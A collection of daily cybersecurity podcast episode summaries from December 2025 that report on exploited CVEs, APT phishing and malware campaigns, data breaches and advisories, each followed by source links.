Welcome to your daily cybersecurity podcast. CISA has added CVE-2023-52163 to its Known Exploited Vulnerabilities Catalog, confirming active exploitation of Digiever DS-2105 Pro network video recorders. This missing authorization flaw allows unauthenticated attackers to bypass security controls. While BOD 22-01 mandates federal agencies to remediate, CISA urges all organizations to prioritize firmware updates. This vulnerability serves as a frequent entry point for actors targeting IoT infrastructure and physical security networks.Genians Security Center reports on APT37's "Artemis" campaign targeting South Korean entities through malicious HWP documents. The attack chain leverages OLE objects and DLL side-loading via the legitimate VolumeId utility to deploy the RoKRAT module. The threat actor employs steganography within images and abuses cloud services like Yandex and pCloud for C2 operations. This multi-stage procedure leverages legitimate execution flows to evade detection by signature-based security solutions.SoundCloud disclosed a cyberattack targeting an ancillary service dashboard, resulting in a data leak affecting 26 million accounts. Exposed data includes email addresses and public profile information; passwords and financial data were not compromised. The incident was followed by DDoS attacks affecting availability. Remediation efforts, specifically reinforcing Identity and Access Management controls, inadvertently caused temporary connectivity issues for VPN users.Socket Security identified two malicious Chrome extensions, named Phantom Shuttle, stealing credentials from 170+ enterprise domains including AWS and GitHub. These extensions use onAuthRequired listeners to inject hardcoded proxy credentials and PAC scripts to reroute sensitive traffic. Operating as a Man-in-the-Middle, the malware exfiltrates plaintext credentials, session cookies, and API keys to the C2 server phantomshuttle[.]space every five minutes.Anna’s Archive released a 300-terabyte dataset containing 86 million scraped Spotify tracks. The breach was achieved through systematic stream-ripping using third-party user accounts over several months. Spotify responded by disabling offending accounts and implementing new safeguards to block automated playback patterns. This massive exfiltration of metadata and audio files represents a significant challenge for digital rights management and creator protection.Sources:CISA KEV Digiever : https://www.cisa.gov/news-events/alerts/2025/12/22/cisa-adds-one-known-exploited-vulnerability-catalogAPT37 Artemis : https://www.genians.co.kr/en/blog/threat_intelligence/dllSoundCloud Breach : https://www.theregister.com/2025/12/16/soundcloud_cyberattack_data_leak/Chrome Phantom Shuttle : https://thehackernews.com/2025/12/two-chrome-extensions-caught-secretly.htmlSpotify Scraping : https://therecord.media/spotify-disables-scraping-annasDon’t think, patch!Your feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.Pornhub alerts Premium subscribers following data exposure on November 8, 2025, via analytics provider Mixpanel. Cybercriminals threaten to directly contact affected users by email. Mixpanel disputes that data originated from its November 8 security incident, stating no evidence of exfiltration from its systems. Pornhub confirms passwords, payment details, and financial information remain uncompromised, with exposure limited to a restricted set of analytics events. Attackers exploit this data for sextortion campaigns specifically targeting identified Premium users.Intezer documents a Goffee group campaign targeting Russian military personnel and defense organizations. The initial attack identified in October uses a malicious XLL file uploaded from Ukraine then Russia to VirusTotal, titled "enemy's planned targets". The file deploys EchoGather backdoor to collect system information, execute commands, and exfiltrate files to a C2 server disguised as food delivery website. Phishing lures include fake concert invitation for senior military officers and letter impersonating Russia's Ministry of Industry and Trade requesting pricing justification documents for defense contracts.CISA and NIST release draft Interagency Report 8597 on protecting identity tokens and assertions against forgery, theft, and malicious use. The document addresses recent incidents at major cloud providers targeting theft, modification, or forgery of identity tokens to access protected resources. The report covers IAM controls for systems using digitally signed assertions and tokens in access decisions. NIST requests CSPs apply Secure by Design principles, prioritizing transparency, configurability, and interoperability. Federal agencies must understand architecture and deployment models of their CSPs to align risk posture and threat environment.Check Point Research documented GachiLoader, a heavily obfuscated Node.js loader malware distributed through the YouTube Ghost Network. The campaign leverages 39 compromised accounts spreading over 100 videos targeting game cheat users, accumulating 220,000 views since December 2024. The malware implements anti-analysis checks including 4 GB minimum RAM, 2 CPU cores, and blacklists for usernames, hostnames, and running processes. GachiLoader disables Windows Defender and adds exclusions for C:\Users, C:\ProgramData, C:\Windows, and the .sys extension. Two variants have been observed: the first downloads Rhadamanthys from C2 servers, while the second deploys Kidkadi.node utilizing Vectored Overloading technique to intercept system calls and load malicious PE.Sources:Pornhub sextortion: https://www.malwarebytes.com/blog/news/2025/12/pornhub-tells-users-to-expect-sextortion-emails-after-data-exposureGoffee APT: https://therecord.media/cyber-spies-fake-new-year-concert-russian-phishingNIST/CISA tokens: https://www.cisa.gov/news-events/alerts/2025/12/22/nist-and-cisa-release-draft-interagency-report-protecting-tokens-and-assertions-tampering-theft-and GachiLoader: https://research.checkpoint.com/2025/gachiloader-node-js-malware-with-api-tracing/Don’t think, patch!Your feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.Most newly registered and parked domains are now serving malicious content. Analysis shows an increasing shift of domain parking services toward hosting phishing pages, fake software updates, and redirects to scam infrastructures. These domains are used as short-lived infrastructure to bypass reputation-based defenses and accelerate fraud and malware delivery campaigns.The Iranian APT group Infy has resurfaced with a new targeted campaign. Operations rely on spear-phishing emails delivering weaponized documents using political and diplomatic lures. Payloads include updated backdoors, Windows registry-based persistence mechanisms, and obfuscated HTTP(S) C2 channels, indicating a structured operational comeback.NIST has released new security guidance for the use of smart speakers in home-based telehealth environments. Identified risks include interception of unencrypted voice traffic, exposure of sensitive health data, and the use of these devices as pivot points into hospital systems. Recommended mitigations focus on encrypted communications, network segmentation, and strict access control.Sources:Malicious domain parking: https://krebsonsecurity.com/2025/12/most-parked-domains-now-serving-malicious-content/APT Infy: https://thehackernews.com/2025/12/iranian-infy-apt-resurfaces-with-new.htmlNIST smart speakers: https://www.nist.gov/news-events/news/2025/12/securing-smart-speakers-home-health-care-nist-offers-new-guidelinesDon’t think, patch!Your feedback is welcome.Email: radiocsirt@gmail.comWebsite:https://www.radiocsirt.comWeekly Newsletter:https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.Amazon disclosed the detection of a North Korea-linked infiltration during an IT hiring process. A system administrator claimed to be US-based was identified through persistent keyboard latency exceeding 110 milliseconds to Seattle servers, indicating intercontinental remote operation. The control infrastructure was traced to China. Since April 2024, Amazon reports blocking more than 1,800 fraudulent hiring attempts linked to North Korea, with a 27 percent quarterly increase.A Russian APT actor is conducting a credential phishing campaign targeting government entities across the Baltics and the Balkans. The attacks rely on HTML attachments masquerading as PDF documents, embedding institutional decoys and fake authentication forms. Credentials are exfiltrated via formcarry.com, with consistent JavaScript and regex reuse observed since at least 2023.Microsoft confirmed a global Microsoft Teams outage impacting message delivery across all regions and clients. The incident started at 14:30 ET and was fully resolved one hour later. No indicators of malicious activity were reported.A malware campaign abuses Microsoft Office documents, SVG files, and compressed archives to compromise Windows systems. The attack chain exploits CVE-2017-11882, uses PNG steganography, and process hollowing via RegAsm.exe to deliver RATs and information stealers.ATM jackpotting attacks in the United States have been attributed to a criminal group deploying the Ploutus malware via physical access to ATMs. The tradecraft involves hard drive replacement or modification to control cash-dispensing modules. Losses are estimated to exceed $40 million since 2020.Don’t think, patch.Sources:Amazon infiltration:https://www.clubic.com/actualite-592366-amazon-infiltre-par-un-espion-nord-coreen-finalement-repere-a-cause-de-sa-frappe-clavier.htmlRussian APT phishing:https://strikeready.com/blog/russian-apt-actor-phishes-the-baltics-and-the-balkans/Microsoft Teams outage:https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-teams-is-down-and-messages-are-delayed/SVG and Office malware campaign:https://cybersecuritynews.com/hackers-weaponize-svg-files-and-office-documents/ATM jackpotting / Ploutus malware:https://www.theregister.com/2025/12/19/tren_de_aragua_atm/Your feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.French authorities arrested a 22-year-old individual following Interior Ministry system compromise. The intrusion exposed email accounts and confidential documents including judicial records and wanted persons databases. The attack was claimed on BreachForums. The suspect maintained network persistence for several days. Paris Prosecutor charged unauthorized access to state systems as organized group, maximum ten years imprisonment.WatchGuard published advisory WGSA-2025-00027 addressing CVE-2025-14733, critical Out-of-bounds Write in Fireware OS iked process, CVSS 9.3. Confirmed active exploitation enables remote unauthenticated code execution. Affected versions 11.10.2 through 12.11.5 and 2025.1 through 2025.1.3. WatchGuard provides four threat actor IP addresses. Patched versions available.Riot Games disclosed four CVEs affecting UEFI in ASUS, Gigabyte, MSI, ASRock motherboards. IOMMU initialization failure enables pre-boot DMA attacks. Malicious PCIe device with physical access can modify system memory before OS load. Carnegie Mellon CERT/CC confirms broad impact. Firmware updates available.Cyderes documents CountLoader 3.2 via cracked software, establishing Google-mimicking persistence every thirty minutes for ten years. Nine capabilities including USB propagation, deploying ACR Stealer. Check Point reports GachiLoader via YouTube Ghost Network, one hundred videos, 220,000 views. Deploys Kidkadi with Vectored Exception Handling PE injection, Rhadamanthys stealer as final payload.CNIL issued one million euro penalty against Mobius Solutions for unlawful retention of 46 million Deezer records post-termination. Data leaked to darknet from unsecured test environment. CNIL confirms extraterritorial GDPR application.Don't overthink it. Patch.Sources:France Arrest: https://therecord.media/france-interior-ministry-hack-arrestWatchGuard: https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00027UEFI: https://www.bleepingcomputer.com/news/security/new-uefi-flaw-enables-pre-boot-attacks-on-motherboards-from-gigabyte-msi-asus-asrock/Loaders: https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.htmlCNIL: https://www.zdnet.fr/actualites/fuite-massive-sur-le-darknet-la-cnil-frappe-fort-contre-un-ancien-sous-traitant-de-deezer-487023.htmYour feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtintl.substack.com

Welcome to your daily cybersecurity podcast.The Clop ransomware group, also tracked as Cl0p, is conducting a new data theft extortion campaign targeting Internet-exposed Gladinet CentreStack servers. Ongoing investigations confirm active scanning, successful intrusions, and the placement of extortion notes on compromised systems. The initial access vector remains unidentified, raising the possibility of a zero-day vulnerability or exploitation of unpatched systems. This activity aligns with Clop’s established focus on file sharing and secure file transfer platforms.CISA has added three actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog. CVE-2025-20393 affects multiple Cisco products through improper input validation. CVE-2025-40602 impacts SonicWall SMA1000 appliances due to a missing authorization flaw. CVE-2025-59374 targets ASUS Live Update, involving embedded malicious code within the update mechanism, highlighting a software supply chain compromise scenario.CERT-FR has issued advisory CERTFR-2025-AVI-1116 covering multiple vulnerabilities in Google Chrome. Affected versions include releases prior to 143.0.7499.146 on Linux and prior to 143.0.7499.146 or .147 on Windows and macOS. The advisory references CVE-2025-14765 and CVE-2025-14766, with limited public technical detail on the underlying impact.A critical FreeBSD vulnerability, CVE-2025-14558, enables remote code execution via crafted IPv6 Router Advertisement packets within the SLAAC mechanism. Insufficient validation of RA messages leads to command injection into an internal shell script. Exploitation requires the attacker to be present on the same network segment. The vulnerability carries a CVSS score of 9.8.North Korean cyber operations reached a record level in 2025, with more than two billion dollars in cryptocurrency stolen, according to Chainalysis. These activities combine attacks against centralized services, large-scale personal wallet compromises, and advanced social engineering operations involving fake recruiters and purported investors.FIRST Foundation highlights the operational importance of incident communications, emphasizing the role of secure alternative channels, third-party coordination mechanisms, and controlled delegation of public communications to reduce secondary risk during major cyber incidents.Finally, a coordinated operation supported by Eurojust dismantled fraudulent call centre operations in Ukraine. The transnational criminal network relied on industrial-scale social engineering techniques, with identified losses exceeding ten million euros and forty-five suspects identified across multiple countries.Don’t overthink it. Patch.Sources:Clop / Gladinet: https://www.bleepingcomputer.com/news/security/clop-ransomware-targets-gladinet-centrestack-servers-for-extortion/CISA KEV: https://www.cisa.gov/news-events/alerts/2025/12/17/cisa-adds-three-known-exploited-vulnerabilities-catalogCERT-FR Chrome: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1116/FreeBSD RCE: https://www.security.nl/posting/917946/Kritiek+beveiligingslek+in+FreeBSD+maakt+remote+code+execution+mogelijk?channel=rssDPRK Crypto: https://www.theregister.com/2025/12/18/north_korea_stole_2b_crypto_2025/FIRST Comms: https://www.first.org/blog/20251216-upskilling_communicationsEurojust Fraud: https://www.eurojust.europa.eu/news/fraudulent-call-centres-ukraine-rolledFrance Arrest: https://therecord.media/france-interior-ministry-hack-arrestYour feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtintl.substack.com

Welcome to your daily cybersecurity podcast.CISA adds CVE-2025-59718 to its Known Exploited Vulnerabilities catalog on December 16th. The flaw affects Fortinet FortiOS, FortiSwitchMaster, FortiProxy, and FortiWeb through improper cryptographic signature verification in FortiCloud SSO SAML authentication. Unauthenticated attackers can bypass authentication via crafted SAML messages. Active exploitation confirmed. CVE-2025-59719 addresses the same underlying issue. Federal agencies face a December 23rd remediation deadline. No ransomware campaign linkage confirmed at this time.CERT-FR issues advisory CERTFR-2025-AVI-1117 concerning GLPI. Two vulnerabilities identified as CVE-2025-59935 and CVE-2025-64520 affect GLPI versions 9.1.0 through prior to 10.0.21. Risks include XSS injection and security policy bypass. Fixes available via GitHub security advisories GHSA-62p9-prpq-j62q and GHSA-j8vv-9f8m-r7jx published December 16th.Cisco reports CVE-2025-20393, a critical AsyncOS zero-day affecting Secure Email Gateway and Secure Email and Web Manager with Internet-exposed Spam Quarantine in non-standard configurations. Active exploitation since late November attributed to Chinese group UAT-9686 deploying AquaShell backdoors, AquaTunnel and Chisel reverse SSH tunnels, and AquaPurge log-clearing tools. Links identified to UNC5174 and APT41. No patch available. Cisco recommends access restriction, network segmentation, and rebuilding compromised appliances as sole eradication option.SonicWall patches CVE-2025-40602, a local privilege escalation in SMA1000 Appliance Management Console. Exploited in chain with CVE-2025-23006, a critical deserialization flaw with CVSS score 9.8 already fixed in January. Combined exploitation enables unauthenticated root remote code execution. Discovered by Google Threat Intelligence Group. Fixed version: build 12.4.3-02856 and higher. Over 950 SMA1000 appliances remain exposed according to Shadowserver.Finally, Recorded Future documents sustained APT28 phishing campaign targeting UKR.net users between June 2024 and April 2025. UKR.net-themed login pages hosted on Mocky distributed via PDF attachments in phishing emails. Links shortened via tiny.cc or tinyurl.com with some redirections through Blogger subdomains. Captures credentials and 2FA codes. Attackers transitioned to ngrok and Serveo proxy services following early 2024 infrastructure takedowns. GRU operation targeting Ukrainian intelligence collection amid ongoing conflict.Don't think, just patch!Sources:CISA KEV: https://www.cisa.gov/news-events/alerts/2025/12/16/cisa-adds-one-known-exploited-vulnerability-catalogCERT-FR: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1117/ Cisco AsyncOS: https://www.bleepingcomputer.com/news/security/cisco-warns-of-unpatched-asyncos-zero-day-exploited-in-attacks/SonicWall: https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-new-sma1000-zero-day-exploited-in-attacks/APT28: https://thehackernews.com/2025/12/apt28-targets-ukrainian-ukr-net-users.htmlYour feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtintl.substack.com

Welcome to your daily cybersecurity podcast.QNAP discloses a high-severity authentication bypass vulnerability tracked as CVE-2025-59385. The flaw allows remote attackers to spoof authentication mechanisms and access protected resources without credentials. The issue affects QTS and QuTS hero systems and is remotely exploitable with no user interaction. Patches are available in QTS 5.2.7.3297 and QuTS hero 5.2.7 and 5.3.1 builds released on October 24.A second QNAP vulnerability, CVE-2025-62848, exposes QTS and QuTS hero systems to remote denial-of-service attacks. The issue stems from a NULL pointer dereference condition and can be triggered over the network without authentication. Successful exploitation leads to system crashes and service disruption. Fixed versions mirror those released for CVE-2025-59385.Trend Micro reveals a previously unseen controller linked to BPFDoor malware, enabling encrypted reverse shells, direct shell access, and lateral movement across Linux servers. The backdoor leverages Berkeley Packet Filter mechanisms to remain stealthy and firewall-agnostic. Activity is attributed with medium confidence to the Earth Bluecrow APT group and targets telecommunications, finance, and retail sectors across Asia and the Middle East.CISA adds two actively exploited vulnerabilities to its Known Exploited Vulnerabilities catalog. CVE-2025-14611 affects Gladinet CentreStack and Triofox via hard-coded cryptographic keys, while CVE-2025-43529 is a WebKit use-after-free flaw impacting multiple Apple products. Federal agencies are required to remediate under BOD 22-01, with strong recommendations extended to all organizations.Avast documents an emerging WhatsApp account takeover scam abusing the platform’s legitimate device-linking feature. Attackers trick users into authorizing rogue linked devices through fake verification pages, granting persistent access to conversations without stealing passwords or triggering security alerts.Finally, The Record reports major data breaches at Prosper Marketplace and 700Credit impacting nearly 20 million individuals. Exposed data includes Social Security numbers, financial records, and identity documents. Both incidents highlight ongoing systemic risks across the financial services supply chain.Don't think, just patch!Sources:CVE-2025-59385: https://cvefeed.io/vuln/detail/CVE-2025-59385CVE-2025-62848: https://cvefeed.io/vuln/detail/CVE-2025-62848BPFDoor: https://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.htmlCISA KEV: https://www.cisa.gov/news-events/alerts/2025/12/15/cisa-adds-two-known-exploited-vulnerabilities-catalogWhatsApp Scam: https://blog.avast.com/blog/onlinescams/whatsapppairingscamData Breaches: https://therecord.media/data-breaches-affecting-20-million-prosper-700creditYour feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtintl.substack.com